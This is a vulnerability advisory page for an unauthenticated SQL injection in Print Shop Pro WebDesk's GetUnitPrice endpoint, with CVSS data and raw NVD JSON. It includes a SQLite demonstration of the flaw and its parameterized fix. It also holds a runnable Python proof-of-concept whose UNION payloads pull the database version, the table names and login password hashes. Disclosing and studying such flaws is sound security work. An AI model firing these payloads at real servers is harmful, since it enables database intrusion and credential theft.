Security Vulnerability Report
CVE-2025-61548 CVSS 9.8 CRITICAL

Published: 2026-01-08 17:15:49
Last Modified: 2026-02-10 18:16:20

Description

SQL Injection is present on the hfInventoryDistFormID parameter of the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.69). Unsanitized user input is incorporated directly into SQL queries without parameterization or escaping, so a remote, unauthenticated attacker (CVSS PR:N/UI:N) can execute arbitrary SQL commands against the application's database.

Weakness: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command)
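The pattern the description names (string-concatenated SQL versus a bound parameter), as an added illustration that is not code from the vendor or from the advisory. The table, column and credential data are constructed for the example, and SQLite stands in for the SQL Server the UNION payloads below target; the lookup shape (one form ID in, one price out) is an assumption about what GetUnitPrice does. It also shows the caveat a tester hits first: a UNION payload must match the original SELECT's column count, so a two-column payload against a one-column query errors out instead of leaking data.

```python
"""Vulnerable vs. parameterized form-ID lookup (constructed example)."""
import sqlite3

# Constructed schema: a price table plus a table the price lookup should
# never be able to reach. Names are invented, not Print Shop Pro's.
SCHEMA = """
CREATE TABLE InventoryDistForm (FormID INTEGER PRIMARY KEY, UnitPrice REAL);
INSERT INTO InventoryDistForm VALUES (1, 0.25), (2, 1.10);
CREATE TABLE Users (Username TEXT, PasswordHash TEXT);
INSERT INTO Users VALUES ('admin', 'sha256$deadbeef');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_unit_price_vulnerable(conn, hf_inventory_dist_form_id: str):
    # The defect the advisory describes: the request parameter is pasted
    # straight into the SQL text, so quotes, UNION and -- are interpreted.
    sql = (
        "SELECT UnitPrice FROM InventoryDistForm "
        f"WHERE FormID = '{hf_inventory_dist_form_id}'"
    )
    return conn.execute(sql).fetchall()


def get_unit_price_fixed(conn, hf_inventory_dist_form_id: str):
    # The fix: the value is bound as a parameter and never parsed as SQL.
    # A payload bound here is just a string that matches no FormID.
    sql = "SELECT UnitPrice FROM InventoryDistForm WHERE FormID = ?"
    return conn.execute(sql, (hf_inventory_dist_form_id,)).fetchall()


def probe_vulnerable(conn, payload: str):
    """Run a payload through the vulnerable lookup and report the outcome.

    Returns ("rows", rows) when the query ran, or ("error", message) when
    the database rejected it, which is what a column-count mismatch does.
    """
    try:
        return ("rows", get_unit_price_vulnerable(conn, payload))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    leak = "1' UNION SELECT PasswordHash FROM Users --"
    two_cols = "1' UNION SELECT Username, PasswordHash FROM Users --"
    print("benign, vulnerable :", get_unit_price_vulnerable(db, "1"))
    print("leak, vulnerable   :", probe_vulnerable(db, leak))
    print("2-col, vulnerable  :", probe_vulnerable(db, two_cols))
    print("leak, fixed        :", get_unit_price_fixed(db, leak))
```

The one-column payload returns the password hash alongside the real price; the same payload bound as a parameter returns nothing. The page's `name, password_hash` payload only works once the tester has found the real column count (for example with `ORDER BY n` or by padding the UNION with `NULL`s).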

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:* - VULNERABLE
Print Shop Pro WebDesk 18.34
Print Shop Pro WebDesk < 19.69

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61548 SQL Injection PoC
# Target: Print Shop Pro WebDesk < 19.69
# Endpoint: /PSP/appNET/Store/CartV12.aspx/GetUnitPrice
# Vulnerable Parameter: hfInventoryDistFormID
import sys

import requests
import urllib3

# verify=False below would otherwise print an InsecureRequestWarning per request
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Target can be overridden on the command line: python poc.py http://host/PSP/...
target_url = sys.argv[1] if len(sys.argv) > 1 else \
    "http://target-server/PSP/appNET/Store/CartV12.aspx/GetUnitPrice"

# Basic SQL Injection test - extract database version
payload_db_version = "1' UNION SELECT @@version --"
# SQL Injection to extract current database name
payload_db_name = "1' UNION SELECT DB_NAME() --"
# SQL Injection to list all tables
payload_list_tables = "1' UNION SELECT name FROM sys.tables --"
# SQL Injection to extract user credentials (two columns: only works once the
# original SELECT is known to return two columns, or after padding with NULLs)
payload_extract_users = "1' UNION SELECT name, password_hash FROM sys.sql_logins --"


def test_sql_injection(url, param_name, payload):
    """Send one payload in the vulnerable parameter and print the response."""
    # Note: a Page.aspx/Method URL is usually an ASP.NET AJAX page method, which
    # expects a JSON body with Content-Type: application/json; if the target
    # rejects the form-encoded request, adjust the headers and body accordingly.
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0'
    }
    data = {param_name: payload}
    try:
        response = requests.post(url, data=data, headers=headers,
                                 timeout=10, verify=False)
        print(f"[*] Payload: {payload}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        # Coarse heuristic: an error string or a long body. Most normal responses
        # exceed 100 bytes, so treat a hit as a prompt to inspect, not as proof.
        if ('sql' in response.text.lower()
                or 'error' in response.text.lower()
                or len(response.text) > 100):
            print("[+] Possible SQL injection detected!")
            print(f"[+] Response snippet: {response.text[:500]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-61548 SQL Injection PoC")
    print("=" * 50)
    # Test basic injection
    test_sql_injection(target_url, 'hfInventoryDistFormID', payload_db_version)
    print("\n" + "=" * 50)

References

https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61548 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61548", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.727", "lastModified": "2026-02-10T18:16:20.083", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection is present on the hfInventoryDistFormID parameter in the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.69). Unsanitized user input is incorporated directly into SQL queries without proper parameterization or escaping. This vulnerability allows remote attackers to execute arbitrary SQL commands"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:*", "matchCriteriaId": "88C72179-FF05-44F1-87A2-80179F38245D"}]}]}], "references": [{"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61548", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61548", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}